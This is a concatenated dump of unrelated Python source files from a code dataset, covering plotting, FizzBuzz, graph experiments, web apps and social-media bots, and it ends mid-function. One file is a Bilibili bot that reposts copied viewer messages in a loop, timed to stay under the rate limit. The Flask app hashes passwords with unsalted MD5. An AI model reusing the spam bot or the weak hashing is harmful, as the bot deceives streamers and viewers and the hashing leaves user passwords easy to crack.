component\n\tplt.plot(pca.explained_variance_ratio_)\n\t# Cumulative\n\tplt.plot(np.cumsum(pca.explained_variance_ratio_))\n\n\t# Assign labels and title\n\tplt.xlabel(\"Dimensions\")\n\tplt.ylabel(\"Explained variance\")\n\tplt.title(\"Explained Variance Ratio by Dimensions\")\n\n\tplt.show()\n\t\n\t\n# Widgets\n\n# Set box layout\nbox_layout = Layout(display='flex',\n\t\t\t\t\tflex_flow='column',\n\t\t\t\t\talign_items='stretch',\n\t\t\t\t\tborder='solid',\n\t\t\t\t\twidth='40%')\n\t\n# Set feature set widget\nfeature_set_widi = Select(\n\t\t options=['original features','original agglomerated features', 'baseline features',\n\t\t \"PCA components (explained variance of 95%)\", \n\t\t\t\t 'only non-sparse features', 'only relevant features', \n\t\t\t\t 'only sparse features', 'only less relevant features',\n\t\t\t\t 'only agglomerated sparse features','only agglomerated less relevant features',\n\t\t\t\t 'agglomerated sparse features + non-sprase features', \n\t\t\t\t 'agglomerated less relevant features + relevant features'],\n\t\t \n\t\tvalue='agglomerated less relevant features + relevant features', \n\t\tdescription='Feature set',\n\t\tlayout=box_layout)\n\n# Set cluster widget\nn_cluster_widi = IntSlider(\n\tvalue=5,\n\tmin=1,\n\tmax=80,\n\tstep=1,\n\tmax_width = 300,\n\tdescription='# clusters')\n","repo_name":"athrado/lang-level","sub_path":"2_Scripts/data_visualization.py","file_name":"data_visualization.py","file_ext":"py","file_size_in_byte":8330,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"70952300745","text":"def mul(a,b):\n\tc = a * b\n\tif c>100:\n\t\treturn c\n\t\t\na = mul(2,4)\t\t\t\t\n#if a==None:\n#if id(a)==id(None):\nif a is None:\n\tprint(\"No Return Value !\")\nelse:\t\n\tprint(a)\n\n\n\n","repo_name":"divyanshugour/Python-Basics","sub_path":"Programs-4/Pro9.py","file_name":"Pro9.py","file_ext":"py","file_size_in_byte":163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"20061150530","text":"# Python sample Fizz Buzz\n\n# 入力メッセージ\nprint('Fizz Buzz を開始します')\nprint('上限値を入力してください')\n\n# 入力値受付\nwhile True:\n\n # 入力値\n var = input()\n\n if var.isdigit():\n # ループ終了\n print('')\n break\n else:\n # 再度入力\n print('数値を入力してください')\n\n# ループ\nfor i in range(int(var) + 1):\n # 出力用変数初期化\n result = ''\n\n # Fizz Buzz 判定\n if i % 3 == 0:\n result = result + 'Fizz'\n if i % 5 == 0:\n 
result = result + 'Buzz'\n\n if len(result) == 0:\n # FizzでもBuzzでもない場合、数値出力\n print(i)\n # ループ継続\n continue\n\n # 出力\n print(result)\n\nelse:\n # 終了メッセージ\n print('Fizz Buzz が終了しました')\n","repo_name":"atrow/python_sample","sub_path":"fizz_buzz.py","file_name":"fizz_buzz.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"74787181064","text":"# coding: utf-8\n\nimport os\nimport pandas as pd\n\nfrom graph_tool import load_graph\nfrom glob import glob\nfrom tqdm import tqdm\nfrom joblib import Parallel, delayed\nfrom itertools import product\n\nfrom eval_helpers import eval_map\nfrom experiment import one_run\n\ninfection_proba = 0.1\n\nmethods = ['our', 'pagerank', 'min-steiner-tree']\n# methods = ['our']\nroot_sampler_names = ['true_root']\nobs_method = 'bfs-head'\n# root_sampler_names = [None]\n\ncascade_model = 'si'\n\n# a batch of settings to iterate through\nsettings = [\n # for grqc\n # {'graphs': ['grqc'],\n # 'obs_fractions': [\"0.5\"],\n # 'cascade_fractions': [\"0.05\", \"0.1\", \"0.15\", \"0.2\", \"0.25\"]},\n # {'graphs': ['grqc'],\n # 'obs_fractions': [\"0.5\", \"0.6\", \"0.7\", \"0.8\", \"0.9\"],\n # 'cascade_fractions': [\"0.05\"]},\n\n # # for lattice and infectious\n # {'graphs': ['infectious', 'lattice-1024'],\n # 'obs_fractions': [\"0.5\"],\n # 'cascade_fractions': [\"0.1\", \"0.2\", \"0.3\", \"0.4\", \"0.5\"]},\n {'graphs': ['infectious', 'lattice-1024', 'grqc'],\n 'obs_fractions': [\"0.1\", \"0.2\", \"0.3\", \"0.4\", \"0.5\", \"0.6\", \"0.7\", \"0.8\", \"0.9\"],\n 'cascade_fractions': [\"0.1\"]}\n]\n\nfor setting in settings:\n graphs, obs_fractions, cascade_fractions = setting['graphs'], \\\n setting['obs_fractions'], \\\n setting['cascade_fractions']\n for graph, obs_fraction, cascade_fraction, method, root_sampler_name \\\n in product(\n graphs, obs_fractions, cascade_fractions, methods, root_sampler_names\n ):\n g = load_graph('data/{}/graph_weighted_{}.gt'.format(graph, infection_proba))\n edge_weights = g.edge_properties['weights']\n\n dataset_id = \"{}-m{}-s{}-o{}-om{}\".format(graph, cascade_model, cascade_fraction, obs_fraction, obs_method)\n print('method', method)\n print('dataset_id', dataset_id)\n\n input_dir = 'cascade/{}/'.format(dataset_id)\n\n if root_sampler_name is not None and method == 'our':\n output_dir = 'output/{}-{}/{}/'.format(method, root_sampler_name, dataset_id)\n eval_result_path = 'eval/{}-{}/{}.pkl'.format(method, root_sampler_name, dataset_id)\n else:\n output_dir = 'output/{}/{}/'.format(method, dataset_id)\n eval_result_path = 'eval/{}/{}.pkl'.format(method, dataset_id)\n\n if not os.path.exists(os.path.dirname(eval_result_path)):\n os.makedirs(os.path.dirname(eval_result_path))\n\n rows = Parallel(n_jobs=-1)(delayed(one_run)(g, edge_weights, input_path, output_dir, method,\n root_sampler_name=root_sampler_name)\n for input_path in tqdm(glob(input_dir + '*.pkl')))\n assert len(rows) > 0, 'nothing calculated'\n\n scores = eval_map(input_dir, output_dir)\n\n summ = pd.Series(scores).describe()\n print(summ)\n summ.to_pickle(eval_result_path)\n","repo_name":"xiaohan2012/cascade-reconstruction-by-tree-samples","sub_path":"experiment_obs_method.py","file_name":"experiment_obs_method.py","file_ext":"py","file_size_in_byte":2996,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"43678930979","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2018/1/26 14:34\n# @Author 
: Leo\n# @Mail : leo@1201.us\n# @File : bilibili.py\n# @Software: PyCharm\n\n\nimport requests\nimport time\nimport random\n\n\nclass SendLiveRoll():\n\n def __init__(self, roomid):\n\n # 直播的房间号\n self.roomid = str(roomid)\n\n # 该网址用于获取数据\n self.url_1 = 'https://api.live.bilibili.com/ajax/msg'\n\n # 用于发弹幕的地址\n self.url_2 = 'https://api.live.bilibili.com/msg/send'\n\n # 模拟浏览器\n self.header = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'\n }\n\n # 账号信息\n self.cookie = {'Cookie': 'l=v; fts=150'}\n\n # 直播间信息\n self.form_1 = {\n 'csrf_token': '',\n 'roomid': self.roomid,\n 'token': ''\n }\n\n self.timestamp = str(int(time.time()))\n\n def DanMuSend(self):\n while True:\n # 请求弹幕信息, 服务器会返回弹幕\n html_1 = requests.post(\n self.url_1,\n data=self.form_1,\n headers=self.header)\n\n # 提取弹幕信息, 每个text_1里面有10条弹幕\n text_1 = list(map(lambda ii: html_1.json()[\n 'data']['room'][ii]['text'], range(10)))\n\n # 复制别人的弹幕, 一般复制最后几个, 目的是避免重复, 采用随机方式\n message = text_1[random.randint(7, 9)]\n print(message)\n\n # 需要提交的数据, 提交给服务器\n form_2 = {\n 'color': '16777215', # 颜色可以改变\n 'fontsize': '25',\n 'mode': '1',\n 'msg': message,\n 'rnd': self.timestamp, # 每次刷新网页的时间/可以不变\n 'roomid': self.roomid, # 改变roomid可以改变不同主播的房间\n }\n\n # 发射弹幕post方法\n requests.post(\n self.url_2,\n data=form_2,\n headers=self.header,\n cookies=self.cookie)\n\n # 弹幕每隔5秒才能继续, bilibili规定\n time.sleep(random.randint(6, 10))\n","repo_name":"qq34384878/Spider","sub_path":"chushou/bilibili.py","file_name":"bilibili.py","file_ext":"py","file_size_in_byte":2340,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"24505958671","text":"from sanic import Sanic\nfrom sanic.response import json\n\nfrom auth import protected\nfrom login import login\n\n\napp = Sanic(\"AuthApp\")\napp.config.SECRET = \"KEEP_IT_SECRET_KEEP_IT_SAFE\"\napp.blueprint(login)\n\n\n@app.get(\"/\")\nasync def hello_world(request):\n return json({\"msg\": \"Hello, world.\"})\n\n\n@app.get(\"/secret\")\n@protected\nasync def secret(request):\n return json({\"msg\": \"To go fast, you must be fast.\"})\n\n","repo_name":"defnngj/learning-API-test","sub_path":"sanic_app/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":98,"dataset":"github-code","pt":"81"} +{"seq_id":"37411669533","text":"import re\nimport requests\nimport json\nfrom urllib.parse import urljoin\nfrom util import *\nfrom database import Page, Confession\nfrom flask import url_for\nimport urllib\n\nBASE_URL = \"https://graph.facebook.com/v2.9/\"\nFB_URL = \"https://www.facebook.com/\"\nPAGE_ACCESS_TOKEN = os.environ[\"PAGE_ACCESS_TOKEN\"]\nCLIENT_SECRET = os.environ[\"CLIENT_SECRET\"]\nAPP_ID = os.environ[\"APP_ID\"]\n\n\ndef makeRequest(endpoint, method=\"GET\", access_token=None, **parameters):\n url = urljoin(BASE_URL, endpoint)\n if access_token:\n parameters['access_token'] = access_token\n\n if method == \"GET\":\n r = requests.get(url, params=parameters)\n elif method == \"POST\":\n r = requests.post(url, data=parameters)\n else:\n raise RuntimeError(\"Unknown request method: \" + str(method))\n if r.status_code == 200:\n debug(\"Url: \" + str(url))\n debug(\"Params: \" + str(parameters))\n printCap = 640\n printText = str(r.text)[:printCap]\n if len(r.text) > printCap:\n printText += \" ...\"\n debug(\"Response: \" + printText)\n return json.loads(r.text)\n else:\n log(\"Failed to query 
{}\".format(url))\n log(\"with params: \" + str(parameters))\n log(r.text)\n return None\n\n\ndef queryFacebook(endpoint, accessToken, fields, **parameters):\n return makeRequest(endpoint, access_token=accessToken, fields=\",\".join(fields), **parameters)\n\n\ndef postFacebook(endpoint, accessToken, **parameters):\n return makeRequest(endpoint, method=\"POST\", access_token=accessToken, **parameters)\n\n\ndef getClientTokenFromCode(sender, code):\n redirect = loginRedirectURI()\n data = makeRequest(\"oauth/access_token\", client_id=APP_ID, redirect_uri=redirect, state=sender, client_secret=CLIENT_SECRET, code=code)\n if not data:\n return None\n\n return data.get(\"access_token\")\n\n\ndef listManagedPages(clientToken):\n # TODO: paging if needed by someone\n response = queryFacebook(\"me/accounts\", clientToken, [\"access_token\", \"name\", \"id\"])\n if response:\n return response.get(\"data\")\n return None\n\n\ndef getPageProfilePictureUrl(pageID, clientToken):\n response = queryFacebook(str(pageID) + \"/picture\", clientToken, [], redirect=\"false\")\n if response:\n return response[\"data\"].get(\"url\")\n\n\ndef objectUrl(pageID):\n return urljoin(FB_URL, str(pageID))\n\npageUrl = objectUrl\npostUrl = objectUrl\n\n\ndef loginUrl(sender, scopes):\n url = \"https://www.facebook.com/v2.9/dialog/oauth\"\n redirectURI = urllib.parse.quote(loginRedirectURI())\n url += \"?redirect_uri={}&client_id={}&scope={}\".format(redirectURI, APP_ID, scopes)\n url += \"&state={}\".format(str(sender))\n log(\"Login URL: \" + url)\n return url\n\n\ndef loginRedirectURI():\n return url_for(\"login_redirect\", _external=True)\n\n\nclass FBObject:\n def __init__(self, id):\n self.id = id\n self.token = None\n\n def query(self, endpoint=\"\", fields=list(), **parameters):\n return queryFacebook(str(self.id) + \"/\" + endpoint, self.token, fields, **parameters)\n\n def post(self, endpoint=\"\", **parameters):\n return postFacebook(str(self.id) + \"/\" + endpoint, self.token, **parameters)\n\n\nclass FBPost(FBObject):\n def __init__(self, id, text=None, token=None):\n super().__init__(id)\n self.text = text\n self.token = token\n\n def fetchText(self):\n response = self.query()\n log(response)\n if response:\n self.text = response.get(\"message\")\n return self.text is not None\n\n def getIndex(self):\n if not self.text:\n status = self.fetchText()\n if not status:\n return None\n\n result = re.search(r'^\\#(\\d+)\\s', self.text)\n if result:\n index = result.group(1)\n return int(index)\n\n def addComment(self, message):\n response = self.post(\"comments\", message=message)\n if response:\n return response.get(\"id\")\n\n\nclass FBPage(FBObject):\n def __init__(self, page):\n super().__init__(page.fb_id)\n self.token = page.token\n\n def getName(self):\n data = self.query()\n if data:\n return data.get(\"name\")\n\n def getProfilePictureUrl(self):\n data = self.query(\"picture\", redirect=False)\n if data:\n return data[\"data\"].get(\"url\")\n\n def getCoverPictureUrl(self):\n data = self.query(fields=[\"cover\"],)\n if data:\n cover = data.get(\"cover\")\n if cover:\n return cover.get(\"source\")\n\n def getRecentPosts(self):\n data = self.query(\"posts\", limit=10)\n if data:\n posts = list()\n for postData in data.get(\"data\"):\n if \"message\" in postData:\n post = FBPost(postData[\"id\"], postData[\"message\"])\n posts.append(post)\n return posts\n\n def getLastConfessionIndex(self):\n posts = self.getRecentPosts()\n if posts:\n for post in posts:\n index = post.getIndex()\n if index:\n return 
index\n\n def postConfession(self, confession):\n referencedConfession = confession.getReferencedConfession()\n if not referencedConfession:\n lastIndex = self.getLastConfessionIndex()\n debug(\"Last index: \" + str(lastIndex))\n if lastIndex:\n index = lastIndex + 1\n else:\n index = Confession.getLastIndex(self.id) + 1\n\n message = \"#{} {}\".format(str(index), confession.text)\n response = self.post(\"feed\", message=message)\n if response:\n return response.get(\"id\"), index\n else:\n post = FBPost(referencedConfession.fb_id, token=self.token)\n id = post.addComment(confession.text)\n if id:\n return id, None\n\n\n","repo_name":"JoeyDP/Confessions-Bot","sub_path":"facebook.py","file_name":"facebook.py","file_ext":"py","file_size_in_byte":5892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"602137248","text":"from django.shortcuts import render, HttpResponse\nfrom contact.models import Contact\nfrom django.contrib import messages\n\n# Create your views here.\n\n\ndef contact(request):\n messages.success(request, 'Welcome to Contact')\n if request.method=='POST':\n name = request.POST['name']\n email = request.POST['email']\n ph_num = request.POST['ph_num']\n message = request.POST['message']\n description = request.POST['description']\n contact = Contact(name=name, email=email, ph_num=ph_num, message=message, description=description)\n return render(request, 'contact.html')\n\n","repo_name":"eLearnInstitute/eLearn-Web","sub_path":"contact/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"38519771821","text":"# coding=utf8\n\ndef parse_person_name(name):\n tokens = name.strip().split()\n if len(tokens) == 2:\n return tokens[0],tokens[1],None\n if len(tokens) == 1:\n return tokens[0],None,None\n if tokens[1][-3:] in ['вна', 'вич']:\n return tokens[0],tokens[2],tokens[1]\n return tokens[1],tokens[0],tokens[2]\n\nimport re\n\ndef process_problem_variations_mathmode(text, variation = None):\n return re.compile(r'\\{\\{(.*?)\\}\\}', re.DOTALL).sub(lambda m:\\\n ''.join(r'\\class{problem-variation-' + str(i) + '}{ ' + opt + ' } ' for i, opt in enumerate(m.group(1).split('||')))\\\n , text)\n\ndef process_problem_variations_textmode(text, variation = None):\n return re.compile(r'\\{\\{(.*?)\\}\\}', re.DOTALL).sub(lambda m:\\\n ''.join(r'<span class=\"problem-variation-{0}\">{1}</span>'.format(i, opt) for i, opt in enumerate(m.group(1).split('||')))\\\n , text)\n\ndef gcd(x, y):\n if x % y == 0:\n return y\n if y % x == 0:\n return x\n return gcd(min(x, y), max(x, y) % min(x, y))\n\ndef lcm(seq):\n cur_lcm = 1\n for k in seq:\n cur_lcm = k * cur_lcm // gcd(k, cur_lcm)\n return cur_lcm\n\ndef process_problem_variations(text, variation = None):\n if variation is not None:\n def variation_chooser(match_object):\n options = match_object.group(1).split('||')\n return options[variation % len(options)]\n return re.compile(r'\\{\\{(.*?)\\}\\}', re.DOTALL).sub(variation_chooser, text)\n\n num_variations = list(set(len(s.split('||')) for s in re.compile(r'\\{\\{(.*?)\\}\\}', re.DOTALL).findall(text)))\n text = re.compile(r'\\$\\$(.*?)\\$\\$', re.DOTALL).sub(lambda m: r'$${0}$$'.format(process_problem_variations_mathmode(m.group(1)), variation), text)\n text = re.compile(r'\\$(.*?)\\$', re.DOTALL).sub(lambda m: r'${0}$'.format(process_problem_variations_mathmode(m.group(1)), variation), text)\n text = 
re.compile(r'\\\\\\((.*?)\\\\\\)', re.DOTALL).sub(lambda m: r'\\({0}\\)'.format(process_problem_variations_mathmode(m.group(1)), variation), text)\n text = re.compile(r'\\\\\\[(.*?)\\\\\\]', re.DOTALL).sub(lambda m: r'\\[{0}\\]'.format(process_problem_variations_mathmode(m.group(1)), variation), text)\n text = process_problem_variations_textmode(text, variation)\n\n if (variation is not None) or len(num_variations) == 0:\n return text\n\n max_variations = max(num_variations)\n if max_variations <= 1:\n return text\n\n buttons_html = '\\n'.join('''\n <button\n class=\"problem-variation-control btn btn-default\"\n data-variation=\"{0}\"\n onclick=\"\n for(var i = 0; i < {1}; ++i) {{\n $(event.target).parent().parent().find('.problem-variation-' + i.toString()).hide(0);\n }}\n $(event.target).parent().parent().find('.problem-variation-' + event.target.dataset.variation).css('display','inline');\n \">{0}</button>'''.replace('\\n','').\\\n format(i, max_variations) for i in range(lcm(num_variations)))\n\n return r'<div class=\"dontprint\">Вариация {0}</div>{1}'.format(buttons_html, text)\n\n\ndef process_latex_lists(text):\n def shuffler(s):\n s = s.split(r'\\item')[1:]\n random.shuffle(s)\n return r'\\begin{itemize} \\item' + r' \\item '.join(s) + r'\\end{itemize}'\n text = re.compile(r'\\\\begin{shuffledlist}(.*?)\\\\end{shuffledlist}', re.DOTALL).sub(lambda m: shuffler(m.group(1)), text)\n\n return text\\\n .replace(r'\\begin{enumerate}','<ol>')\\\n .replace(r'\\end{enumerate}','</ol>')\\\n .replace(r'\\begin{itemize}','<ul>')\\\n .replace(r'\\end{itemize}','</ul>')\\\n .replace(r'\\item','<li>')\n\ndef process_xypic_macros(text):\n return re.compile(r'\\\\edge{(.*?)}', re.DOTALL).sub(lambda m: r'\\ar@{{-}}[{0}]'.format(m.group(1)), text)\\\n .replace(r'\\vrtxf', r'*[o]{\\bullet}')\\\n .replace(r'\\vrtx', r'*[o]{\\circ}')\n\ndef latex_to_html(text, variation = None):\n text = re.compile(r'(?<!\\\\)%.*$', re.MULTILINE).sub('', text)\n text = escape(text)\n text = re.compile(r'\\\\emph{(.*?)}', re.DOTALL).sub(lambda m: r'<em>{0}</em>'.format(m.group(1)), text)\n text = re.compile(r'\\\\textit{(.*?)}', re.DOTALL).sub(lambda m: r'<em>{0}</em>'.format(m.group(1)), text)\n text = re.compile(r'\\\\textbf{(.*?)}', re.DOTALL).sub(lambda m: r'<strong>{0}</strong>'.format(m.group(1)), text)\n text = re.sub(r'\\\\,', ' ', text).replace('---','—').replace('--','–').replace('~',' ')\n\n text = process_latex_lists(text)\n text = process_problem_variations(text, variation)\n text = process_xypic_macros(text)\n\n return text\n\nfrom flask import Flask\nfrom flask import escape, render_template, request, redirect, url_for, jsonify\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_mail import Mail, Message\nfrom datetime import datetime, date\nfrom collections import defaultdict\nimport random\nimport flask.ext.login as flask_login\n\n# Security sensitive constants are imported from a file not being synced with github\nfrom tpbeta_security import *\n\napp = Flask(__name__)\n\napp.secret_key = tpbeta_app_secret_key\n\napp.config['SQLALCHEMY_DATABASE_URI'] = tpbeta_sqlalchemy_db_uri\napp.config['SQLALCHEMY_POOL_RECYCLE'] = 280\n\napp.config['MAIL_SERVER'] = tpbeta_mail_server\napp.config['MAIL_PORT'] = tpbeta_mail_port\napp.config['MAIL_USERNAME'] = tpbeta_mail_username\napp.config['MAIL_PASSWORD'] = tpbeta_mail_password\napp.config['MAIL_DEFAULT_SENDER'] = tpbeta_mail_default_sender\napp.config['MAIL_USE_SSL'] = True\n\napp.debug = True\ndb = SQLAlchemy(app)\nmail = Mail(app)\n\nlogin_manager = 
flask_login.LoginManager()\nlogin_manager.init_app(app)\nteachers = tpbeta_teacher_usernames\n\n\n\nfrom hashlib import md5 as md5hasher\n\ndef md5(s):\n m = md5hasher()\n m.update(s.encode())\n return m.hexdigest()\n\nclass AcademicGroup(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n number = db.Column(db.Integer)\n year = db.Column(db.Integer)\n def __init__(self, number, year = None):\n self.number = number\n self.year = year\n\nclass User(db.Model, flask_login.UserMixin):\n id = db.Column(db.Integer, primary_key=True)\n username = db.Column(db.String(80), unique=True)\n pwdhash = db.Column(db.String(32))\n firstname = db.Column(db.Unicode(80))\n middlename = db.Column(db.Unicode(80))\n lastname = db.Column(db.Unicode(80))\n email = db.Column(db.Unicode(80))\n def __repr__(self):\n return '<User {0}>'.format(self.username)\n\nclass Learner(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n user_id = db.Column(db.Integer, db.ForeignKey('user.id'), unique = True, nullable = False)\n academic_group = db.Column(db.Integer, db.ForeignKey('academic_group.id'))\n latex_project_url = db.Column(db.UnicodeText)\n\n # In case a student is visiting classes with a different group:\n academic_group_real = db.Column(db.Integer, db.ForeignKey('academic_group.id'))\n\n def __init__(self, username, email, names):\n self.username = username\n self.email = email\n\nclass ProblemSnapshot(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n problem_id = db.Column(db.Integer, db.ForeignKey('problem.id'), nullable = False)\n datetime = db.Column(db.DateTime, nullable = False)\n statement = db.Column(db.UnicodeText, nullable = False)\n\nclass ProblemComment(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n problem_id = db.Column(db.Integer, db.ForeignKey('problem.id'), nullable = False)\n datetime = db.Column(db.DateTime, nullable = False)\n text = db.Column(db.UnicodeText)\n author = db.Column(db.Integer, db.ForeignKey('user.id'), nullable = False)\n in_reply_to = db.Column(db.Integer)\n\nclass Problem(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n title = db.Column(db.Text)\n statement = db.Column(db.UnicodeText, nullable = False)\n creator = db.Column(db.Integer, db.ForeignKey('user.id'))\n parent = db.Column(db.Integer)\n last_modified = db.Column(db.DateTime)\n clones = db.Column(db.Text)\n author_comment = db.Column(db.Text)\n topics = db.Column(db.Text)\n concepts = db.Column(db.Text)\n\nclass Topic(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n topic = db.Column(db.Text)\n level = db.Column(db.Integer)\n parent = db.Column(db.Integer)\n connected_topics = db.Column(db.Text)\n comment = db.Column(db.Text)\n\nclass Concept(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n concept = db.Column(db.Text)\n comment = db.Column(db.Text)\n\nclass History(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n datetime = db.Column(db.DateTime, nullable = False)\n user = db.Column(db.Integer, db.ForeignKey('user.id'))\n problem = db.Column(db.Integer, db.ForeignKey('problem.id'))\n event = db.Column(db.String(100))\n comment = db.Column(db.Text)\n\nclass TestLog(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n datetime = db.Column(db.DateTime)\n user = db.Column(db.Integer, db.ForeignKey('user.id'))\n test_number = db.Column(db.Integer)\n problems = db.Column(db.Text)\n\nclass Trajectory(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n topics = db.Column(db.Text)\n comment = 
db.Column(db.Text)\n\n@login_manager.user_loader\ndef user_loader(id):\n return User.query.filter_by(id = id).first()\n\n@login_manager.request_loader\ndef request_loader(request):\n user = User.query.filter_by(username = request.form.get('username')).first()\n if user is None:\n return\n\n user.is_authenticated = False\n if 'pw' in request.form and hasattr(user,'pwdhash') and md5(request.form['pw']) == user.pwdhash:\n user.is_authenticated = True\n\n return user\n\n@app.route('/add_user', methods=['GET','POST'])\n@flask_login.login_required\ndef calc_md5():\n if flask_login.current_user.username != tpbeta_superuser_username:\n return 'Only supervisor can add users.'\n\n if request.method == 'GET':\n return '''\n <form action='add_user' method='POST'>\n <input type='text' name='username' id='username' placeholder='логин'></input>\n <input type='text' name='name' id='name' placeholder='Фамилия Имя Отчество'></input>\n <input type='password' name='pw' id='pw' placeholder='предлагаемый пароль'></input>\n <input type='submit' name='submit'></input>\n </form>\n '''\n\n user = User.query.filter_by(username = request.form['username']).first()\n if user is not None:\n return 'Такой пользователь уже существует'\n\n u = User()\n u.username = request.form['username']\n u.firstname, u.lastname, u.middlename = parse_person_name(request.form['name'])\n u.pwdhash = md5(request.form['pw'])\n db.session.add(u)\n db.session.commit()\n\n return 'Пользователь {0} успешно добавлен'.format(u.username)\n\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n already_logged = False\n login_successful = False\n bad_login = False\n username = ''\n if request.method == 'GET':\n if flask_login.current_user is not None and hasattr(flask_login.current_user, 'username'):\n already_logged = True\n username = flask_login.current_user.username\n else:\n user = User.query.filter_by(username = request.form['username']).first()\n if user is not None and hasattr(user, 'pwdhash') and md5(request.form['pw']) == user.pwdhash:\n flask_login.login_user(user)\n login_successful = True\n username = request.form['username']\n else:\n bad_login = True\n\n return render_template(\n 'login.html',\n already_logged = already_logged,\n login_successful = login_successful,\n bad_login = bad_login,\n username = username)\n\n@app.route('/logout')\ndef logout():\n flask_login.logout_user()\n return redirect(url_for('login'))\n\n@login_manager.unauthorized_handler\ndef unauthorized_handler():\n return redirect(url_for('login'))\n\n@app.route('/group/<int:group_number>/test/<int:test_number>/ajax_update', methods = ['POST'])\n@flask_login.login_required\ndef ajax_update_group_table(group_number, test_number):\n if flask_login.current_user.username not in teachers:\n return jsonify(result=\"You need to be logged in as a teacher to update test results\")\n\n data = {}\n for s in request.json:\n if s.startswith('learner'):\n data[int(s[len('learner'):])] = request.json[s].split(',')\n\n num_updated_items = 0\n num_added_items = 0\n result_translator = { '∅' : 'SEEN' , '□' : 'TRIED', '◩' : 'ALMOST', '■' : 'SUCCESS'}\n for log in TestLog.query.filter_by(test_number = test_number).all():\n if log.user in data:\n problem_numbers = map(int, log.problems.split(','))\n for n,r in zip(problem_numbers,data[log.user]):\n if r in result_translator:\n h = History.query.filter_by(problem = n, user = log.user, comment = 'TEST{0}'.format(test_number)).first()\n if h is None:\n h = History()\n if result_translator[r] == 'ALMOST':\n h.datetime = 
datetime.now()\n else:\n h.datetime = log.datetime or datetime(1,1,1)\n h.comment = 'TEST{0}'.format(test_number)\n h.user = log.user\n h.problem = n\n h.event = result_translator[r]\n db.session.add(h)\n num_added_items += 1\n elif h.event != result_translator[r]:\n h.event = result_translator[r]\n num_updated_items += 1\n\n db.session.commit()\n if num_added_items > 0 and num_updated_items > 0:\n return jsonify(result=\"Успешно добавлены {0} и обновлены {1} отметок\".format(num_added_items, num_updated_items))\n if num_updated_items > 0:\n return jsonify(result=\"Успешно обновлены {0} отметок\".format(num_updated_items))\n if num_added_items > 0:\n return jsonify(result=\"Успешно добавлены {0} отметок\".format(num_added_items))\n return jsonify(result=\"Нечего обновлять\")\n\n\n@app.route('/group/<int:group_number>/test/<int:test_number>/edit')\n@flask_login.login_required\ndef edit_group_table(group_number, test_number):\n if flask_login.current_user.username not in teachers:\n return \"Login required for this URL\"\n\n test_log_items = db.session.query(TestLog)\\\n .filter(TestLog.test_number == test_number)\\\n .join(Learner, Learner.user_id == TestLog.user)\\\n .join(AcademicGroup, Learner.academic_group == AcademicGroup.id)\\\n .filter(AcademicGroup.number == group_number)\\\n .all()\n\n if len(test_log_items) == 0:\n return 'Похоже, тест с таким номером ещё не проводился: о нём нет информации в базе данных.'\n\n test_history = History.query.filter_by(comment='TEST{0}'.format(test_number))\\\n .join(Learner, Learner.user_id == History.user)\\\n .join(AcademicGroup, Learner.academic_group == AcademicGroup.id)\\\n .filter(AcademicGroup.number == group_number)\\\n .all()\n\n items = []\n for log in test_log_items:\n u = User.query.filter_by(id = log.user).first()\n result_translator = {'SEEN' : '∅', 'TRIED' : '□', 'ALMOST' : '◩', 'SUCCESS' : '■'}\n u_history = {h.problem: result_translator[h.event] for h in test_history if h.user == u.id and h.event in result_translator}\n problem_ids = list(map(int, log.problems.split(',')))\n results = [''] * len(problem_ids)\n for i, p in enumerate(problem_ids):\n if p in u_history:\n results[i] = u_history[p]\n else:\n results[i] = str(problem_ids[i])\n items.append(dict(\n name = '{0} {1}'.format(u.lastname,u.firstname),\n id = u.id,\n marks = [\n { 'id': problem_ids[i],\n 'result': results[i]} for i in range(len(results))]))\n max_problems = max( len(x['marks']) for x in items )\n for x in items:\n if len(x['marks']) < max_problems:\n x['marks'] += [''] * (max_problems - len(x['marks']))\n\n return render_template(\n 'result_table_snippet.html',\n user = flask_login.current_user.username,\n group = group_number,\n test = test_number,\n student_results = items,\n problem_labels = list(range(1, max_problems+1)))\n\n@app.route('/problem/<int:problem_id>')\n@flask_login.login_required\ndef show_problem(problem_id):\n if flask_login.current_user.username not in teachers:\n if not db.session.query(History.id).filter(History.user == flask_login.current_user.id, History.problem == problem_id, History.event.in_(['SEEN', 'TRIED', 'ALMOST', 'SUCCESS'])).first():\n return 'Просматривать задачу могут только преподаватели либо ранее решавшие её студенты.'\n\n problem = Problem.query.filter_by(id=problem_id).first()\n if problem is None:\n return 'Задача с id {0} не найдена.'.format(problem_id)\n\n variation = None\n if request.args.get('variation'):\n variation = int(request.args.get('variation'))\n\n if flask_login.current_user.username in teachers:\n 
